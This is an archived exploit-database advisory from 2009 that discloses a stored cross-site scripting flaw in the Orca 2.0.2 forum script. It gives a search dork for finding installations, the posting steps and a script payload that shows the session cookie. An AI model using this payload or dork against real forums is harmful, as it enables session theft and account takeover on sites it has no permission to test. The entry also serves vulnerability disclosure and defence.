id: 4763
date: 01/30/2009
title: Orca 2.0.2 (Topic) Remote XSS Vulnerability
author: J-Hacker
cves: 

===========================================
Orca 2.0.2 (Topic) Remote XSS Vulnerability
===========================================


--------------------------------------------------------------------------\
[+]  Script : Orca-v.2.0.2
[+]  Bug: Xss
[+]  Download : http://www.boonex.com/thankyou.php?p=Orca-v.2.0
[+]  D0rk :Powered by Orca Interactive Forum Script. Copyright 2008 My Company
--------------------------------------------------------------------------
First you must login then write new topic
write in the topic
 "><script>alert(document.cookie)</script>
demo: http://www.demozzz.com/orca/demo/?action=goto&topic_id=test--2009-01-30#topic/-script-alert-document-cookie-script-.htm
--------------------------------------------------------------------------



#  0day.today [2023-03-25]  #